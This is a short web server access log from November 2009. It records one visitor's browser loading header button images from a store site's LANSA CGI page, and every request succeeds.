66.30.149.221 - - [26/Nov/2009:02:38:13 -0500] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:13 -0500] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:14 -0500] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:14 -0500] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:14 -0500] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
